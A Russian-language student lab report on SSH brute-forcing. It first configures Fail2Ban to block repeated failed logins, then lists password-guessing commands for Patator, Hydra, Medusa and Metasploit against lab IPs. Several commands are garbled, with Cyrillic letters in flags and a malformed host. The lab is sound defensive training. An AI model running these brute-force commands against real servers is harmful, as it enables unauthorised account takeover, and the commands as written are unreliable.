# **Практическая работа № 1** **Тема: "Brute-force на SSH"** * 1 шаг - установка Fail2Ban ![](https://i.imgur.com/sIS0RvH.png) * 2 шаг - запускаем сервис ![](https://i.imgur.com/VNm9jXC.png) * Теперь посмотрим файлы конфигурации ![](https://i.imgur.com/WgsLxSJ.png) * Нам надо создать фильтр для ssh ![](https://i.imgur.com/7JkcTj9.png) * Для того, что применился новый конфигурационный файл перезагружаем сервис. ![](https://i.imgur.com/aQbHYnb.png) * Проверим, что fail2ban работает. ![](https://i.imgur.com/UcwRl50.png) * Теперь можно подключиться из другой тачки к нашей, на которой защущен fail2ban ![](https://i.imgur.com/P6FsumL.png) * Как видим, при вводе 3 раза неверного пароля нашу машину блокирует ![](https://i.imgur.com/6HUO6PI.png) * Если необходимо разблокировать тачку, используем команду "fail2ban-client unban [ip-адресс]" ![](https://i.imgur.com/dKdZ1me.png) ____________________________________________________ **Теперь перейдем к практике по брутфорсу ssh** ~~"Во всех скринах скрыт найденный пароль, так как мои виртуальные тачки используются на постоянной основе."~~ 1.Patator Для подбора пароля средствами Patator используется команда: patator ssh_login host=lll.11.11.11 user=test password=FIIEO O=/root/wordlist -х ignore:mesg='Authentication failed' ![](https://i.imgur.com/bDsnsxv.png) 2.Hydra Для подбора пароля с помощью Hydra используется команда: hydra -V -f -t 4 -1 test -Р /root/wordlist ssh://111.11.11.11 ![](https://i.imgur.com/PnqXFsj.png) 3.Medusa Для подбора пароля с помощью Medusa используется команда: medusa -h 192.168.60.50 -u test -Р /root/wordlist -М ssh -f -v 6 ![](https://i.imgur.com/e4ANWDA.png) 4.Metasploit Используем ssh_login, заполняем необходимые опции и брутфорсим. ![](https://i.imgur.com/2sAuG5m.png) ![](https://i.imgur.com/bsaHPtE.png) ![](https://i.imgur.com/kAPh5xM.png)